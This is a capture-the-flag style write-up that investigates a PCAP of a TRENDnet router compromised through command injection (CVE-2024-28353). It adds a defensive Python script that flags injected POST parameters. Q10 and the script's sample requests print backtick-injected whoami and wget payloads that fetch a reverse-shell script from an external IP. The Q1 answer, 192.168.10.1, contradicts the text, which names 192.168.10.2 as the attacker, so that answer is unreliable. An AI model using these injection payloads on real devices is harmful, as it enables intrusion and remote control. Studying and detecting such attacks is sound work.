Trent
Last updated
The SOC team has identified suspicious lateral movement targeting router firmware from within the network. Anomalous traffic patterns and command execution have been detected on the router, indicating that an attacker already inside the network has gained unauthorized access and is attempting further exploitation. You will be given network traffic logs from one of the impacted machines. Your task is to conduct a thorough investigation to unravel the attacker's Techniques, Tactics, and Procedures (TTPs).
Q1) From what IP address did the attacker initially launch their activity?
Let's navigate to Statistics > Conversations to review IP pairings and determine which internal IP address initiated communication with the router.
Let's filter for this IP address and POST requests to verify whether it was the initial IP used by the attacker to launch their activity.
Next, we will trace the HTTP stream for further analysis.
The attacker sent a POST request from IP address 192.168.10.2 to modify the router's configuration.
Answer: 192.168.10.1
Q2) What is the model name of the compromised router?
The router’s IP address is 192.168.10.1, and the attacker is targeting its admin interface via POST requests to /apply_sec.cgi and /apply.cgi. These endpoints, along with pages like smbserver.asp, suggest a web-based admin panel.
Answer: TEW-827DRU
Q3) How many failed login attempts did the attacker try before successfully logging into the router?
It appears that the attacker initially attempted to use two different passwords before discovering that no password was required.
We can also utilize NetworkMiner as an additional tool for analysis.
Answer: 2
Q4) At what UTC time did the attacker successfully log into the router's web admin interface?
Answer: 2024-05-01 15:53:27
Q5) How many characters long was the password used to log in successfully?
As observed in Q3, no password is required.
Answer: 0
Q6) What is the current firmware version installed on the compromised router?
Let's follow the HTTP stream.
Answer: 2.10
Q7) Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?
Answer: usbapps.config.smb_admin_name
Q8) What is the CVE number associated with the vulnerability that was exploited in this attack?
Answer: CVE-2024-28353
Q9) What was the first command the attacker executed by exploiting the vulnerability?
Answer: whoami
Q10) What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?
Answer: wget http://35.159.25.253:8000/a1l4m.sh
Q11) Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?
In this request, the attacker removed the backtick (`) at the end. Let's analyze the TCP stream associated with this request.
Answer: Access to this resource is forbidden
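Q7, Q10 and Q11 together describe the detection opportunity in this traffic: a single POST parameter (`usbapps.config.smb_admin_name`) carrying shell metacharacters, an external download URL inside it, and one request where the closing backtick is missing. The script below is an added example written for this writeup, not part of the original lab or the router's software. It percent-decodes constructed POST bodies (the sample requests are made up to mirror the shapes discussed above, not copied from the PCAP), flags values of the watched parameter that contain characters an SMB username never needs, extracts any host:port a download command points at, and notes unbalanced backticks. The field names and the `triage` helper are this example's own assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample requests (not taken from the lab PCAP); they imitate the
# shape of POSTs to the router's apply_sec.cgi endpoint described in the writeup.
SAMPLE_REQUESTS = [
    {"src": "192.168.10.2", "dst": "192.168.10.1", "path": "/apply_sec.cgi",
     "body": "action=usbapps_config&usbapps.config.smb_admin_name=admin"},
    {"src": "192.168.10.2", "dst": "192.168.10.1", "path": "/apply_sec.cgi",
     "body": "usbapps.config.smb_admin_name=%60whoami%60"},
    {"src": "192.168.10.2", "dst": "192.168.10.1", "path": "/apply_sec.cgi",
     "body": "usbapps.config.smb_admin_name=%60wget+http%3A%2F%2F35.159.25.253%3A8000%2Fa1l4m.sh%60"},
    # The Q11 "typo" case: the closing backtick is missing.
    {"src": "192.168.10.2", "dst": "192.168.10.1", "path": "/apply_sec.cgi",
     "body": "usbapps.config.smb_admin_name=%60wget+http%3A%2F%2F35.159.25.253%3A8000%2Fa1l4m.sh"},
]

WATCHED_PARAM = "usbapps.config.smb_admin_name"   # the parameter abused in this case
SHELL_META = re.compile(r"[`;|&$]")               # characters an SMB admin name never needs
URL_RE = re.compile(r"https?://[^\s`'\"]+")       # stops at whitespace, quotes or a backtick


def analyse(req):
    """Return a finding dict for one request, or None if the watched parameter is absent."""
    params = parse_qs(req["body"], keep_blank_values=True)   # also percent-decodes the value
    values = params.get(WATCHED_PARAM)
    if not values:
        return None
    value = values[0]
    urls = URL_RE.findall(value)
    return {
        "src": req["src"],
        "dst": req["dst"],
        "value": value,
        "injected": bool(SHELL_META.search(value)),
        # An odd number of backticks means the command substitution was never closed.
        "unbalanced_backticks": value.count("`") % 2 == 1,
        # Every external host:port a download inside the value points at.
        "download_hosts": sorted({f"{urlparse(u).hostname}:{urlparse(u).port}" for u in urls}),
    }


def triage(requests):
    """Findings for every request whose watched parameter contains shell metacharacters."""
    findings = []
    for req in requests:
        finding = analyse(req)
        if finding and finding["injected"]:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REQUESTS):
        note = " (unbalanced backtick)" if f["unbalanced_backticks"] else ""
        print(f'{f["src"]} -> {f["dst"]}: {f["value"]!r}{note} hosts={f["download_hosts"]}')
```

Run against real traffic, the `body` field would come from the decoded HTTP request bodies (for example exported from Wireshark or NetworkMiner), and the `download_hosts` list gives the external addresses to pivot on when looking for the follow-on connection in Q12.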
Q12) What was the IP address and port number of the command and control (C2) server when the actor's reverse shell eventually did connect? (IP:Port)
Let's retrieve and review the contents of the Bash script that was downloaded by the attacker.
Alternatively, NetworkMiner can extract the downloaded script directly from the capture.
Answer: 35.159.25.253:41143